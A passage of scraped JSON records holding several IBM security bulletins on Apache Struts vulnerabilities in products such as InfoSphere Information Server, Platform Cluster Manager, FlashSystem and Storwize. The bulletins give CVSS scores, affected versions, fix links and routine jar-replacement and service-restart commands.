[_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5 \nIBM InfoSphere Information Governance Catalog: versions 11.3, and 11.5 \nIBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, Information Governance Catalog| 11.5| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.5.0.1_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041893>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_isf_ru3_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance[_ Rollup patch 5_](<http://www-01.ibm.com/support/docview.wss?uid=swg24042914>) \nInfoSphere Information Server, Information Governance Catalog| 11.3| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_isf_ru5_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_IGC_ru23_server_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 9.1| JR56313| \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_isf_ru11_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_JR56302_MWB_server_engine_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 8.7| JR56313| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_isf_ru4_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR56302_MWB_server_engine_client_multi>) \n \nNote: \n1\\. Some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. \n2\\. For IBM InfoSphere Information Server version 8.5, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:42:18", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Struts affect IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2162", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3087", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4430", "CVE-2016-4431", "CVE-2016-4433", "CVE-2016-4436", "CVE-2016-4438", "CVE-2016-4465"], "modified": "2018-06-16T13:42:18", "id": "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922", "href": "https://www.ibm.com/support/pages/node/549551", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:51:06", "description": "## Summary\n\nOpen Source Apache Struts Vulnerabilities were addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\n**CVE-ID**: CVE-2017-12611 \n**Description**: Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/131603_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n\n**Platform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.34-lib.zip package on the management node.\n\n# mkdir -p /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n\n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n\n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto\n\n \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.34-lib.zip package on the management node.\n\n4\\. # mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n\n5\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n \n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download the struts-2.3.34-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.34/_](<http://archive.apache.org/dist/struts/2.3.34/>)\n\n2\\. Copy the struts-2.3.34-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.34-lib.zip package on the management node\n\n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup\n\n \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-* /root/backup \n \n# unzip struts-2.3.34-lib.zip \n# cd struts-2.3.34/lib/ \n# cp xwork-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.34.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.21.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n# pcmhatool failmode -m manual \n# pmcadmin stop \n# pmcadmin start \n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the management node:\n\n# pmcadmin stop \n# pmcadmin start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-24T02:07:21", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts Vulnerabilities affect IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2018-06-24T02:07:21", "id": "F71D5D04C2F0092342927E605713DFE45269C2A24CFC53DC412619417A4461D1", "href": "https://www.ibm.com/support/pages/node/705943", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:52:40", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics 1.3.0 IF18. \nAn upgrade to Apache Struts version 2.3.28.1 was performed.\n\n## Vulnerability Details\n\n**CVE-ID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>)\n\n**Description:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.\n\nCVSS Base Score:** **6.1\n\nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111514_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for more information\n\nCVSS Environmental Score*: Undefined\n\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF18](<http://www.ibm.com/support/docview.wss?uid=swg24043000>) \n\n\nFor users of IBM Social Media Analytics 1.2 IBM recommends upgrading to IBM Social Media Analytics 1.3. \n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Struts and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone known. Apply Social Media Analytics 1.3.0 IF18 interim fix.\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-06-15T22:47:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2016-4003)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2018-06-15T22:47:17", "id": "9655812C157678ED2990414C144E3BE29B141DF944F935E84247C6809BFAF59A", "href": "https://www.ibm.com/support/pages/node/285469", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-30T09:48:02", "description": "## Summary\n\nApache Struts could potentially allow a remote attacker to bypass security restrictions, caused by predictable tokens. \n\n## Vulnerability Details\n\n**CVEID: **[**_CVE-2014-7809_**](<https://vulners.com/cve/CVE-2014-7809>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/98963_](<http://xforce.iss.net/xforce/xfdb/98963>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N\n\n## Affected Products and Versions\n\n**IBM FlashSystem 840:** \nMachine Type 9840, model -AE1 (all supported releases) \nMachine Type 9843, model -AE1 (all supported releases) \n \n**IBM FlashSystem V840:** \nMachine Type 9846, model -AE1 (all supported releases) \nMachine Type 9848, model -AE1 (all supported releases) \n \nThe Service Assist GUI is the only component in these products that uses the Apache Struts library. \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**840 MTMs: ** \n9840-AE1 & \n9843-AE1 \n \n**V840 MTMs:** 9846-AE1 & \n9848-AE1| _A code fix is now available, the VRMF of this code level is 1.1.3.6 (or later)_| _ __N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n**Note:** \nV840 customers must upgrade the code of both the -AE1 and -ACx (whether -AC0 or -AC1) nodes to address this vulnerability. A customer reading this to fix one model type (e.g. \u2013AE1) should look for the corresponding security bulletin which describes how to fix the other model type (e.g. perhaps \u2013AC0) in the customer's V840. \n \n[_Link to FlashSystem 840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>) \n \n[_Link to FlashSystem V840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: IBM FlashSystem 840 and IBM FlashSystem V840, -AE1 models nodes are affected by vulnerabilities in Apache\u2019s Struts library (CVE-2014-7809)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-02-18T01:45:50", "id": "0FEF8414C4D35E1CF57FAA80A4963C99470B852C3455B106AAEEAFC9EF57A118", "href": "https://www.ibm.com/support/pages/node/690239", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T01:34:36", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V9000 is susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V9000 including machine type and models (MTMs) for all available code levels._ MTMs affected include 9846-AE2, 9848-AE2, 9846-AC2, and 9848-AC2\n\n## Remediation/Fixes\n\n_V9000 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**V9000 MTMs:** \n9846-AE2, \n9848-AE2, \n9846-AC2 & \n9848-AC2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream. These code levels work for both the storage enclosure nodes (-AEx) and the control nodes (-ACx)_ \n \n__Code Fix VRMF .__ \n_7.6 stream: 7.6.0.4 (or later)_ \n_7.5 stream: 7.5.1.3 (or later)_ \n_7.4 stream: 7.4.1.4 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n \n[**_FlashSystem V9000 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-18T00:10:19", "type": "ibm", "title": "Security Bulletin: A vulnerability in Struts affects the IBM FlashSystem model V9000 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-06-18T00:10:19", "id": "57D5D7F551864FE98EB015D9D1AEB418275353D91DF5CC988649246B5CB1C2F5", "href": "https://www.ibm.com/support/pages/node/690787", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-09T11:26:17", "description": "## Summary\n\nAn Open Source Apache Struts vulnerability was disclosed in September 2015. Struts is used by SAN Volume Controller and Storwize Family. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \n \nAll products are affected when running supported releases 1.1 to 7.5 except for versions 7.4.0.8 and 7.5.0.5 and above. Version 7.6 is not affected.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.4.0.8 \n7.5.0.6 \n7.6.0.3 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller and Storwize Family (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-03-29T01:48:02", "id": "809237077FCC3D7946948EF3FA21FE3D90B0A0CB1F84CDAB9C1A81AA794E8B6C", "href": "https://www.ibm.com/support/pages/node/690947", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-13T05:38:03", "description": "## Summary\n\nApache Struts could potentially allow a remote attacker to bypass security restrictions, caused by predictable tokens. \n\n## Vulnerability Details\n\n**CVEID: 